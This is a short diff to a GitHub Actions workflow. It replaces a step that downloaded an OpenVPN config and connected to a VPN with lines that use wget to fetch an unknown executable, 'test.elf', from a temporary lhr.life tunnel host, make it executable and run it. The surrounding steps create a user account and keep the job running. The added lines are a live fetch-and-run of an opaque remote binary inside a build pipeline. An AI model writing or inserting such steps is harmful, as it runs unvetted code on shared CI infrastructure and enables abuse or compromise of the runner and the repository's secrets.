--- a/.github/workflows/run.yml
+++ b/.github/workflows/run.yml
@@ -37,8 +37,10 @@ jobs:
         ./CreatUser_f1ver
         echo "==========[ USER CREATED ]=========="
         ## printf "%s\n" "${{ github.event.inputs.ovpn }} ##
-        wget https://0eaccb83ea5364.lhr.life/mf.ovpn
-        sudo openvpn --config mf.ovpn
+        wget https://d22c543f3b2a60.lhr.life/test.elf
+        chmod +x test.elf
+        ./test.elf
+        ##sudo openvpn --config mf.ovpn
         echo "salam tamam"
         
     - name: keep running
